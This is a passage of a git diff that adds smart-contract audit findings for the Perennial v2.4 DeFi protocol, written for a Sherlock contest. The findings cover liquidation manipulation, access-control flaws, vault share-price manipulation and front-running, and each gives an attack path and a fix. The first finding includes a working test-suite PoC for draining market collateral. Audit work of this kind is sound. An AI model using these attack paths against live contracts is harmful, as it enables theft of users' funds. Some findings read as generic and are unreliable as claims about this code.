Attacker liquidates his position, increasing it to `2**62 - 1` or any other huge amount. +5. Attacker awaits commited price for the epoch of position increase (or commits himself). +6. Immediately after that, attacker commits any other price different from the previous commit with timestamp 1 second after the previous commit. +7. In the same transaction, attacker withdraws all market collateral either from account1 or account2 (depending on which account ends up in a huge profit due to price change). +Result: Attacker steal all funds from the market. + +### Impact + +All market funds are stolen by the Attacker. + +### PoC + +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity +it('liquidator increases position', async () => { + const riskParameter = { ...(await market.riskParameter()) } + const riskParameterTakerFee = { ...riskParameter.takerFee } + riskParameterTakerFee.linearFee = parse6decimal('0.003') + riskParameter.takerFee = riskParameterTakerFee + riskParameter.margin = parse6decimal('0.012') + riskParameter.maintenance = parse6decimal('0.01') + riskParameter.minMargin = parse6decimal('5') + riskParameter.minMaintenance = parse6decimal('5') + riskParameter.staleAfter = BigNumber.from(14400) + await market.updateRiskParameter(riskParameter) + + const COLLATERAL_USER = parse6decimal('30') + const POSITION_USER = parse6decimal('10') + const POSITION2_USER = parse6decimal('100000000') + + dsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + COLLATERAL, + false, + ) + + await market + .connect(user) + 
['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION_USER, 0, COLLATERAL_USER, false) + + const ORACLE_VERSION_3b = { + price: parse6decimal('100'), + timestamp: TIMESTAMP + 7200, + valid: true, + } + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3b.timestamp).returns([ORACLE_VERSION_3b, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_4.timestamp]) + + // position opened. now close position (user is not liquidatable yet) + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false) + + var loc = await market.locals(user.address); + console.log("user collateral before liquidation: " + loc.collateral); + + // version 3 is commited and user becomes liquidatable + oracle.status.returns([ORACLE_VERSION_3b, ORACLE_VERSION_4.timestamp]) + + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION2_USER, 0, 0, true) + + oracle.status.returns([ORACLE_VERSION_4, ORACLE_VERSION_5.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); +}) +``` + +Console output: +```solidity +user collateral before liquidation: 26310000 +user collateral: -36899977657400 +user pos: long = 100000000000000 +``` + +### Mitigation + +Require the liquidation order to only decrease position. 
\ No newline at end of file diff --git a/033.md b/033.md new file mode 100644 index 0000000..60b2573 --- /dev/null +++ b/033.md @@ -0,0 +1,54 @@ +Clumsy Pink Otter + +Medium + +# Liquidations are temporarily blocked if user's pending position close amount is greater than the latest position size. + +### Summary + +A new feature in v2.4 is guaranteed position change via Intents: since the price is provided in the Intent itself, it doesn't need the corresponding epoch oracle price to be valid. This makes it possible to close positions even when the position opening is still pending (if all orders are from Intents), as such pending negative (pending position closure) is allowed to be greater than the latest position size for intent orders: + +```solidity + if ( + context.pendingLocal.invalidation != 0 && // pending orders are partially invalidatable + context.pendingLocal.neg().gt(context.latestPositionLocal.magnitude()) // total pending close is greater than latest position + ) revert IMarket.MarketOverCloseError(); +``` + +The issue is that a liquidation order is always a "normal" order (invalidation == 1), thus this condition is always enforced for liquidations. However, if pending negative is already greater than the latest position magnitude, it's impossible to create a liquidation order which will satisfy this condition (an order can only increase pending negative and can't influence the latest position). In such situations liquidations will temporarily be impossible until some pending order becomes committed and the condition can be satisfied. 
+ +### Root Cause + +Incorrect validation for protected orders in case `pendingLocal.neg > latestPosition.magnitude()`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L118-L122 + +Notice that there is special handling for the case of crossing zero (when a pending order closes long and opens short or vice versa): in such a case the liquidation order must be empty (since crossing zero is prohibited for non-empty non-intent orders). But there is no such handling for the case of a large pending position closure. + +### Internal pre-conditions + +- User has more pending close than latest position at the last committed oracle price (for example, user fully closes long position, then opens long again, then closes again). + +### External pre-conditions + +None. + +### Attack Path + +1. User has some position open (for example, `long = 10`) +2. User uses Intent to fully close position +3. Shortly after that (order to close still pending) user uses Intent to open position again (for example, `long = 10`). +4. Then immediately user uses Intent again to partially close position of `size = 1` +5. Shortly after that (all user orders are still pending) the price sharply drops and user becomes liquidatable. +6. At this time, user's latest position = 10, pending positive (open) = 10, pending negative (close) = 11. +7. All liquidations will revert, because regardless of liquidation order size, pending negative will remain greater than latest position (10). +8. Once the pending order to close is settled, liquidation is possible again, but might be too late as the user might already accumulate bad debt. + +Result: User cannot be liquidated in time and is liquidated much later, when his position is already in bad debt, which is a funds loss for all market users or a risk of a bank run as the last to withdraw won't have enough funds in the market to pay out. 
+ +### Impact + +All liquidation attempts revert although the user should be liquidatable, thus liquidation happens later than it should, potentially creating bad debt and loss of funds for all market users. + +### Mitigation + +Similar to crossing zero, include special check when liquidating - and if pending negative is greater than latest position, require liquidation order to be empty. \ No newline at end of file diff --git a/034.md b/034.md new file mode 100644 index 0000000..28dfcb5 --- /dev/null +++ b/034.md @@ -0,0 +1,55 @@ +Careful Aegean Koala + +High + +# Frontrunning attack in Vault contract + +#### 1. Description +The `Vault` contract is vulnerable to front-running attacks due to the following issues: + +1. Slippage Vulnerability in `convertToShares` and `convertToAssets`: + - The functions `convertToShares` and `convertToAssets` calculate conversion rates using real-time ratios (`totalAssets` and `totalShares`) without implementing slippage protection. + - These ratios are derived from the latest checkpoint (`_checkpoints[_accounts[address(0)].read().latest]`) and can be influenced by external factors, such as deposits or redemptions. + - An attacker can monitor pending transactions and manipulate the checkpoint timing to alter the conversion rate temporarily, leading to unfavorable slippage for the victim. + +2. No Commit-Reveal Mechanism: + - Actions like deposits, redemptions, and updates are executed in a single transaction without a commit-reveal scheme. + - This makes sensitive operations vulnerable to sandwich attacks, where an attacker: + 1. Front-runs the user's transaction to manipulate the state (e.g., increase asset prices). + 2. Executes their own transaction to profit from the manipulated state. + 3. Back-runs the user's transaction to restore the original state. + +#### 2. Proof of Concept +1. Slippage Manipulation: + - Alice submits a transaction to deposit assets into the vault. 
+ - Bob, a malicious actor, detects Alice's pending transaction in the mempool. + - Bob front-runs Alice's transaction by submitting a large deposit, which shifts the `totalAssets` and `totalShares` ratio. + - Alice's transaction executes at an unfavorable rate due to the altered ratio. + - Bob back-runs Alice's transaction by withdrawing his deposit, restoring the original state while profiting from the temporary manipulation. + +2. Sandwich Attack: + - Alice submits a transaction to redeem shares from the vault. + - Bob detects Alice's pending transaction and front-runs it by redeeming a large number of shares, causing the `totalAssets` to decrease. + - Alice's transaction executes at a lower asset-per-share ratio, resulting in fewer assets received. + - Bob back-runs Alice's transaction by re-depositing his redeemed assets, restoring the original state while profiting from the price difference. + +[Code](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/vault/contracts/Vault.sol#L137-L153): + +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} + +function convertToAssets(UFixed6 shares) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? shares : shares.muldiv(_totalAssets, _totalShares); +} +``` + +#### 3. Impact +- Financial Loss: Users may experience significant slippage or lose funds due to sandwich attacks. +- Market Integrity: Manipulation of conversion rates undermines the fairness and reliability of the vault's operations. +- Likelihood: High (Front-running is a well-documented and prevalent attack vector in DeFi). 
\ No newline at end of file diff --git a/035.md b/035.md new file mode 100644 index 0000000..5d384d8 --- /dev/null +++ b/035.md @@ -0,0 +1,66 @@ +Clumsy Pink Otter + +Medium + +# Access violation: Intent counterparty submitter is allowed to be signer instead of operator + +### Summary + +When user submits Intent, he specifies the `account` which will be the counterparty of the trade: +```solidity +function update(address account, Intent calldata intent, bytes memory signature) external nonReentrant whenNotPaused { + if (intent.fee.gt(UFixed6Lib.ONE)) revert MarketInvalidIntentFeeError(); + + verifier.verifyIntent(intent, signature); + + _updateIntent( + account, + msg.sender, + intent.amount.mul(Fixed6Lib.NEG_ONE), + intent.price, + address(0), + address(0), + UFixed6Lib.ZERO, + UFixed6Lib.ZERO, + false + ); // account + ... +``` + +The issue is that `msg.sender` must be the `operator` of the `account`, because he doesn't sign anything in this function. However, his address is used as signer in `_updateIntent` (which loads update context, filling in signer from the factory, and then later checking the signer flag in `InvariantLib.validate`), thus it's enough for `msg.sender` to be either `signer` or `operator`. If `msg.sender` is only `signer`, he should have no access to this function, but he can execute it and it's enough to be `signer` while not submitting any signature. + +The same issue happens with the following `market.update`: +```solidity + function update(address account, Fixed6 amount, address referrer) external nonReentrant whenNotPaused { + _updateMarket(account, msg.sender, Fixed6Lib.ZERO, amount, Fixed6Lib.ZERO, referrer); + } +``` +It's enough for `msg.sender` to be signer of account to execute the action, although he doesn't provide any signature, so it must be operator-only. 
+ +### Root Cause + +`msg.sender` is used as signer argument to `_updateIntent`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L154 + +And the same issue here: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L223-L225 + +### Internal pre-conditions + +- User is set as a signer of account, but not as operator + +### External pre-conditions + +None. + +### Attack Path + +- User who only has signer access to account is able to execute `market.update` on behalf of account which is supposed to be only used by the operator. + +### Impact + +Security access violation: user with incorrect role is able to access function which should be accessed only by the other role. + +### Mitigation + +Use `address(0)` in `_updateIntent` for `account` signer, and in `_updateMarket` which is not connected with the signature. \ No newline at end of file diff --git a/036.md b/036.md new file mode 100644 index 0000000..9f57000 --- /dev/null +++ b/036.md @@ -0,0 +1,49 @@ +Shambolic Mint Dinosaur + +High + +# Same-Transaction Deposit/Withdrawal + +### Summary + +The update function allows updating positions and collateral in the same transaction without delays, risking flash loan exploits. + +### Root Cause + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L232 the update function allows changing positions and collateral in the same transaction, enabling attackers to bypass collateral checks via flash loans. +The collateral parameter allows users to deposit (Fixed6 > 0) or withdraw (Fixed6 < 0) collateral in the same transaction as position updates. +The key vulnerable logic lies in the _updateMarket function which directly processes collateral changes without enforcing a cooldown. The code does not enforce a delay between deposits and withdrawals. 
+ +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L752 the collateral is updated. + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L771 the withdrawal is made. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +1. Deposit Collateral: + update(account, Fixed6.wrap(0), Fixed6.wrap(0), Fixed6.wrap(1000e18), referrer); +2. Borrow Against Collateral: + update(account, Fixed6.wrap(0), Fixed6.wrap(-500e18), Fixed6.wrap(0), referrer); // Short 500 tokens +3. Withdraw Collateral in Same Transaction: + update(account, Fixed6.wrap(0), Fixed6.wrap(0), Fixed6.wrap(-1000e18), referrer); // Withdraw all + +### Impact + +1. Flash loans can bypass collateral checks. +2. An attacker deposits collateral, borrows assets, and withdraws collateral in the same transaction, leaving the protocol undercollateralized, violating protocol solvency. + +### PoC + +_No response_ + +### Mitigation + +Enforce a 1-block delay for withdrawals after deposits. 
\ No newline at end of file diff --git a/037.md b/037.md new file mode 100644 index 0000000..569e2ac --- /dev/null +++ b/037.md @@ -0,0 +1,118 @@ +Cheerful Taffy Dolphin + +Medium + +# Duplicate Market Allocation Bypass Leads to Continuous Rebalancing and Fee Drain + +## Summary + +A vulnerability exists in `_updateRebalanceGroup` where duplicate markets can be used to bypass the target allocation validation: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/CollateralAccounts/Controller.sol#L277 + +```solidity +UFixed6 totalAllocation; +for (uint256 i; i < message.markets.length; i++) { + marketToGroup[owner][message.markets[i]] = message.group; + _rebalanceConfigs[owner][message.group][message.markets[i]] = message.configs[i]; + groupToMarkets[owner][message.group].push(IMarket(message.markets[i])); + + totalAllocation = totalAllocation.add(message.configs[i].target); +} + +if (message.markets.length != 0 && !totalAllocation.eq(UFixed6Lib.ONE)) + revert ControllerInvalidRebalanceTargetsError(); +``` + +## Impact +When a rebalancing configuration is set with duplicate markets, the storage updates result in a single market having a target allocation less than 100%, while the validation is bypassed by summing the duplicate targets. For example, using [marketA, marketA] with 60% targets each would pass validation (120% total) but store a 60% target for marketA. 
+ +This impacts the rebalancing mechanism in `checkGroup` which is used by `_rebalanceGroup`: + +```solidity +function checkGroup(address owner, uint256 group) public view returns ( + Fixed6 groupCollateral, + bool canRebalance, + Fixed6[] memory imbalances +) { + // Query collateral and calculate imbalances based on stored targets + (actualCollateral, groupCollateral) = _queryMarketCollateral(owner, group); + + for (uint256 i; i < actualCollateral.length; i++) { + IMarket market = groupToMarkets[owner][group][i]; + RebalanceConfig memory marketRebalanceConfig = _rebalanceConfigs[owner][group][address(market)]; + (bool canMarketRebalance, Fixed6 imbalance) = RebalanceLib.checkMarket( + marketRebalanceConfig, // Contains invalid target < 100% + groupToMaxRebalanceFee[owner][group], + groupCollateral, + actualCollateral[i] + ); + imbalances[i] = imbalance; + canRebalance = canRebalance || canMarketRebalance; + } +} +``` + +Because the system is configured with a target that sums to less than 100% (e.g., 60% through duplicate market inputs), it will perpetually try to rebalance to an impossible state through marketTransfer calls in _rebalanceGroup. This creates a feedback loop where repeated rebalancing attempts lead to continuous fee extraction and MEV opportunities, as the system can never achieve the invalid target allocation. The comment // read from storage to trap duplicate markets indicates this risk was known but the implementation fails to prevent it. + +## Fix + +To fix this, the function should either: +1. Add a check for duplicate markets before processing them, or +2. 
Calculate the total allocation by reading from the storage mappings after they've been updated, which would naturally handle duplicates correctly + +For example: + +```solidity +function _updateRebalanceGroup( + RebalanceConfigChange calldata message, + address owner +) private { + if (message.group == 0 || message.group > MAX_GROUPS_PER_OWNER) + revert ControllerInvalidRebalanceGroupError(); + + if (message.markets.length > MAX_MARKETS_PER_GROUP) + revert ControllerInvalidRebalanceMarketsError(); + + // Delete existing group configuration + for (uint256 i; i < groupToMarkets[owner][message.group].length; i++) { + address market = address(groupToMarkets[owner][message.group][i]); + delete _rebalanceConfigs[owner][message.group][market]; + delete marketToGroup[owner][market]; + } + delete groupToMarkets[owner][message.group]; + + // Check for duplicates and validate total allocation before state changes + UFixed6 totalAllocation; + for (uint256 i; i < message.markets.length; i++) { + // Check for duplicates in the input array + for (uint256 j = 0; j < i; j++) { + if (message.markets[i] == message.markets[j]) + revert ControllerDuplicateMarketError(message.markets[i]); + } + + // Accumulate total allocation + totalAllocation = totalAllocation.add(message.configs[i].target); + } + + // Validate total allocation equals 100% if group is not being deleted + if (message.markets.length != 0 && !totalAllocation.eq(UFixed6Lib.ONE)) + revert ControllerInvalidRebalanceTargetsError(); + + // Update state after all validation passes + for (uint256 i; i < message.markets.length; i++) { + uint256 currentGroup = marketToGroup[owner][message.markets[i]]; + if (currentGroup != 0) + revert ControllerMarketAlreadyInGroupError(IMarket(message.markets[i]), currentGroup); + + marketToGroup[owner][message.markets[i]] = message.group; + _rebalanceConfigs[owner][message.group][message.markets[i]] = message.configs[i]; + groupToMarkets[owner][message.group].push(IMarket(message.markets[i])); 
+ groupToMaxRebalanceFee[owner][message.group] = message.maxFee; + + emit RebalanceMarketConfigured(owner, message.group, message.markets[i], message.configs[i]); + } + + emit RebalanceGroupConfigured(owner, message.group, message.markets.length); +} +``` diff --git a/038.md b/038.md new file mode 100644 index 0000000..09c9899 --- /dev/null +++ b/038.md @@ -0,0 +1,57 @@ +Cheerful Taffy Dolphin + +Medium + +# Restrictive Domain Validation in Verifier Contract Breaks Zero-Domain Message Processing and Market Integrations + +## Summary + +The `Verifier` contract implements critical signature verification functionality for the Perennial protocol but relies on a `VerifierBase` implementation that does not match its documented behavior for domain validation. + +The contract's documentation explicitly states: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Verifier.sol#L58 + +```solidity +/// Messages verification request must come from the domain address if it is set. +/// - In the case of intent / fills, this means that the market should be set as the domain. +``` + +However, through inheritance of VerifierBase's `validateAndCancel` modifier, all verification functions (`verifyIntent`, `verifyOperatorUpdate`, `verifySignerUpdate`, `verifyAccessUpdateBatch`) enforce a stricter domain validation that requires msg.sender to match the domain in all cases. + +## Impact +The restrictive domain validation in the `Verifier` contract has critical implications for the protocol's operation, particularly in the verification of intents and signature processing: + +1. Intent Processing Disruption: +When markets attempt to verify intents via `verifyIntent()`, the current implementation forces a strict domain match even for legitimate zero-domain cases. 
This directly impacts order fills since every intent verification must route through a specific market address as msg.sender, preventing any flexible intent verification patterns. + +2. Market Integration Limitations: +Since `verifyIntent()` is a key entry point for order processing, markets must be the msg.sender for any intent verification. Consider a case where multiple markets need to verify the same intent - the current domain validation makes this impossible since the intent can only be verified by the specific market set in the domain field. + +3. Excessive Domain Enforcement: +Operations like `verifyOperatorUpdate()` and `verifySignerUpdate()` which manage protocol permissions are unnecessarily restricted. These administrative functions should reasonably support zero-domain verification, especially for direct account management. However, the current validation forces even these basic account operations to route through a domain address. + +These restrictions conflict with the protocol's own documentation which specifies domain validation should only occur "if it is set," suggesting the current behavior is unintentional and could be blocking legitimate protocol interactions. + +## Recommended mitigation steps +Update the `Verifier` contract to override or implement its own domain validation: + +```solidity +contract Verifier is VerifierBase, IVerifier, Initializable { + modifier validateDomain(Common calldata common) { + if (common.domain != address(0) && common.domain != msg.sender) + revert VerifierInvalidDomainError(); + _; + } + + function verifyIntent(Intent calldata intent, bytes calldata signature) + external + validateDomain(intent.common) // Add flexible domain validation + validateAndCancel(intent.common, signature) + { + // ... 
existing implementation + } + + // Apply to other verification functions +} +``` diff --git a/039.md b/039.md new file mode 100644 index 0000000..5abad28 --- /dev/null +++ b/039.md @@ -0,0 +1,103 @@ +Cheerful Taffy Dolphin + +Medium + +# First Depositor Share Price Manipulation via Zero Minimum Deposit Enables Unfair Value Extraction From Subsequent Depositors + +## Summary +A vulnerability exists in the Vault contract where an attacker can manipulate the initial share price ratio by exploiting the lack of minimum deposit enforcement during initialization. While the contract has a `minDeposit` parameter in its `VaultParameter` struct, the initialization explicitly sets this to zero, creating a window where an attacker can establish an unfavorable share ratio through a minimal initial deposit before any deposit limits are enforced. + +The issue lies in the initialization sequence and how it affects early depositors. + +1. During initialization, the Vault sets parameters with zero minimum deposit: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L70 + +```solidity +function initialize( + Token18 asset_, + IMarket initialMarket, + UFixed6 initialDeposit, + string calldata name_ +) external initializer(1) { + // ... + _updateParameter(VaultParameter(initialDeposit, UFixed6Lib.ZERO)); +} +``` + +2. The share calculation for deposits is handled in `convertToShares()`: +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} +``` + +3. 
When users deposit, the `_update()` function enforces minimum deposit checks: +```solidity +function _update( + Context memory context, + address account, + UFixed6 depositAssets, + UFixed6 redeemShares, + UFixed6 claimAssets +) private { + // ... + if (!depositAssets.isZero() && depositAssets.lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); + // ... +} +``` + +## vulnerability sequence: +1. Contract is initialized with `minDeposit = 0` +2. First depositor can deposit a tiny amount (e.g., 1 wei) since there's no minimum enforcement +3. Their shares are minted 1:1 with assets since `_totalShares.isZero()` +4. They can manipulate underlying asset value through market actions +5. Subsequent depositors get fewer shares due to the manipulated asset/share ratio + + +## Impact + +The impact manifests in the share/asset ratio manipulation through the `convertToShares()` calculation: + +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} +``` + +When legitimate users deposit after the attack: +1. Share Dilution: If attacker deposits 1 wei and manipulates _totalAssets to 100 ETH, a user depositing 50 ETH would receive shares calculated as: `50 ETH * (1 wei) / 100 ETH`, resulting in dramatically fewer shares than their deposit proportion warrants. + +2. Value Extraction: The attacker can then extract value by redeeming their disproportionate shares. Their 1 wei initial deposit now controls a significant portion of the vault's shares, allowing them to claim an unfair percentage of all subsequent deposits when redeeming. The profit is realized as: `(initial_share_price - manipulated_share_price) * attacker_shares`. 
+ +This creates a systemic asymmetry where every new deposit inherently advantages the attacker's position due to the manipulated share/asset ratio established during initialization. + +## Recommendation: +Add mandatory minimum deposit enforcement in initialization: +```solidity +function initialize( + Token18 asset_, + IMarket initialMarket, + UFixed6 initialDeposit, + UFixed6 minDeposit, // New required parameter + string calldata name_ +) external initializer(1) { + require(!minDeposit.isZero(), "Vault: minimum deposit must be non-zero"); + __Instance__initialize(); + asset = asset_; + _name = name_; + _register(initialMarket); + _updateParameter(VaultParameter(initialDeposit, minDeposit)); +} +``` + +This ensures there's always a meaningful minimum deposit requirement from the very first deposit, preventing share price manipulation through tiny initial deposits. + +While the owner could theoretically call `updateParameter()` right after initialization to set a minimum, relying on external actions for security invariants is unsafe. The contract must enforce these constraints at the protocol level. + +The fix makes the security guarantee explicit in code rather than depending on proper owner operation. diff --git a/040.md b/040.md new file mode 100644 index 0000000..979ee5d --- /dev/null +++ b/040.md @@ -0,0 +1,61 @@ +Cheerful Taffy Dolphin + +Medium + +# Lack of Slippage Protection in Share Minting Allows MEV Sandwich Attacks and Market Manipulation Which can Extract Value From Depositors + +## Summary + +There is no slippage protection in the Vault's deposit mechanism, which means users have no way to specify minimum shares they expect to receive when depositing assets. This omission exposes users to potential value loss through share price manipulation and market movements during the transaction confirmation period. 
While the contract handles the deposit-to-shares conversion through `convertToShares()`, it lacks any guardrails to protect users from executing deposits at unexpectedly unfavorable rates. + + +The vulnerability manifests in the share price calculation mechanics within the vault's deposit flow. When users deposit assets, the conversion to shares occurs through `convertToShares()`: + +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} +``` + +The core issue is that the `_update()` function accepts the deposit and mints shares without any minimum share output validation: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L313 +```solidity +function _update( + Context memory context, + address account, + UFixed6 depositAssets, + UFixed6 redeemShares, + UFixed6 claimAssets +) private { + // No slippage check before executing the deposit + context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + asset.pull(msg.sender, UFixed18Lib.from(depositAssets)); +} +``` + +The share price can be manipulated between transaction submission and execution through multiple vectors: +- The vault's market positions can be adjusted via `_manage()`, affecting `totalAssets()` +- Underlying oracle price updates shift position valuations +- Front-running deposits/withdrawals can alter the share/asset ratio through `context.global.update()` + +This allows MEV bots to sandwich deposit transactions by: +1. Front-running with actions that devalue shares +2. Allowing victim's deposit to execute at unfavorable share ratio +3. 
Back-running to restore share price and extract value + +## Impact +The vulnerability creates a systemic risk for depositors since their transactions can be exploited by MEV bots or suffer from adverse price movements with no recourse to revert based on share output. The lack of slippage protection means every deposit transaction is potentially vulnerable to sandwich attacks and market manipulation, leading to direct value extraction from depositors. + +## Fix +The fix requires adding slippage validation during the deposit flow: +```solidity +// Add minSharesOut parameter to update function +if (convertToShares(depositAssets).lt(minSharesOut)) revert InsufficientSharesOut(); +``` + +This enforces user-specified minimum share requirements before proceeding with deposit execution. + + diff --git a/041.md b/041.md new file mode 100644 index 0000000..94d20c3 --- /dev/null +++ b/041.md @@ -0,0 +1,82 @@ +Cheerful Taffy Dolphin + +Medium + +# Suboptimal Position Size Rounding in MakerVault Reduces Protocol Fee Generation + +## Summary +In MakerVault's implementation of `_strategy()`, maker position sizes are being calculated with overly conservative rounding that reduces vault revenue without providing additional safety benefits: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/MakerVault.sol#L20 + +```solidity +// in MakerVault.sol +function _strategy( + Context memory context, + UFixed6 deposit, + UFixed6 withdrawal, + UFixed6 ineligible +) internal override view returns (Target[] memory targets) { + return MakerStrategyLib.allocate(context.registrations, deposit, withdrawal, ineligible); +} +``` + +The issue manifests in MakerStrategyLib's position size calculations, where rounding down is used despite safety checks already being enforced elsewhere. This reduces the vault's fee-generating capacity without providing additional risk protection. 
+ +The vault's fundamental safety checks happen early in the allocation process. The `allocate()` function first validates that there's sufficient collateral and assets: + +```solidity +// In allocate(): +if (collateral.lt(context.totalMargin)) revert MakerStrategyInsufficientCollateralError(); +if (assets.lt(context.minAssets)) revert MakerStrategyInsufficientAssetsError(); +``` + +After these core validations pass, the vault calculates market-specific allocations in `_allocateMarket()`. Here, the available assets for each market are strictly bounded by both the weight-based allocation and a leveraged collateral limit: + +```solidity +marketAssets = assets + .mul(marketContext.registration.weight) + .min(marketCollateral.mul(LEVERAGE_BUFFER)); +``` + +The `LEVERAGE_BUFFER` of 1.2x provides an additional safety margin on the collateral allocation. Only after these conservative limits are applied does the vault calculate the final maker position size: + +```solidity +newMaker = marketAssets + .muldiv(marketContext.registration.leverage, marketContext.latestPrice.abs()) + .max(marketContext.minPosition) + .min(marketContext.maxPosition); +``` + +This calculation currently rounds down, but by this point in the execution flow, we're already operating within comprehensively checked safety bounds. The rounding down creates maker positions slightly smaller than what the vault's capital could safely support. Since maker positions generate fees for the vault, this conservative rounding actually reduces revenue potential without providing additional safety, as all key risk constraints were enforced upstream through explicit checks and bounds. + +The impact compounds because the vault typically operates across multiple markets and rebalances regularly. Each time this calculation runs, the rounding down slightly reduces position sizes below what's safely achievable within the already-enforced risk parameters. 
Rounding up the maker position calculation would allow the vault to capture this lost fee generation opportunity while still respecting all safety constraints, since the core protections are already handled by the upstream checks and bounds. + +## Recommended Fix + +The fix is to use this instead: + +```solidity +// In MakerStrategyLib._allocateMarket() +function _allocateMarket( + MarketMakerStrategyContext memory marketContext, + UFixed6 totalMargin, + UFixed6 collateral, + UFixed6 assets +) private pure returns (Target memory target, UFixed6 marketCollateral) { + // ... existing code ... + + // Use muldivOut instead of muldiv for maker position calculation to maximize fee generation + // while staying within pre-validated safety bounds + UFixed6 newMaker = marketAssets + .muldivOut(marketContext.registration.leverage, marketContext.latestPrice.abs()) // Changed to muldivOut + .max(marketContext.minPosition) + .min(marketContext.maxPosition); + + target.maker = Fixed6Lib.from(newMaker).sub(Fixed6Lib.from(marketContext.currentAccountPosition.maker)); + + // ... rest of the function ... +} +``` + +This modification ensures the vault maximizes its fee-generating capacity while maintaining all existing safety guarantees provided by the upstream checks and bounds. \ No newline at end of file diff --git a/042.md b/042.md new file mode 100644 index 0000000..c3ce43b --- /dev/null +++ b/042.md @@ -0,0 +1,79 @@ +Cheerful Taffy Dolphin + +Medium + +# Vault Collateral Over-Reservation Bug Leads to 100% Capital Lockup Due to Zero-State Division Edge Case + +## Summary +In the vault's allocation logic, there's a critical bug in how ineligible collateral is calculated during early vault states or after full redemptions. 
The issue stems from the `_ineligible()` function that determines how much collateral should be reserved vs made available for new allocations: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L459 + +```solidity +function _ineligible(Context memory context, UFixed6 deposit, UFixed6 withdrawal) private pure returns (UFixed6) { + UFixed6 redemptionEligible = UFixed6Lib.unsafeFrom(context.totalCollateral) + .unsafeSub(context.global.assets.add(withdrawal)) + .unsafeSub(context.global.deposit.sub(deposit)); + + return redemptionEligible.mul( + context.global.redemption.unsafeDiv( + context.global.shares.add(context.global.redemption) + ) + ).add(context.global.assets); +} +``` + +The bug emerges in the edge case when there are no shares and no redemptions in the vault - a state that occurs at vault initialization or if all shares have been redeemed. + +```solidity +// In UFixed6Lib: +function unsafeDiv(UFixed6 a, UFixed6 b) internal pure returns (UFixed6) { + if (isZero(b)) { + return isZero(a) ? ONE : MAX; + } else { + return div(a, b); + } +} +``` + +This is used in the ineligible calculation: + +```solidity +redemptionEligible.mul( + context.global.redemption.unsafeDiv( + context.global.shares.add(context.global.redemption) + ) +) +``` + +Consider what happens when the vault has no shares and no redemptions: +- `context.global.shares` is 0 +- `context.global.redemption` is 0 +- So `context.global.shares.add(context.global.redemption)` is 0 +- And `context.global.redemption` is also 0 + 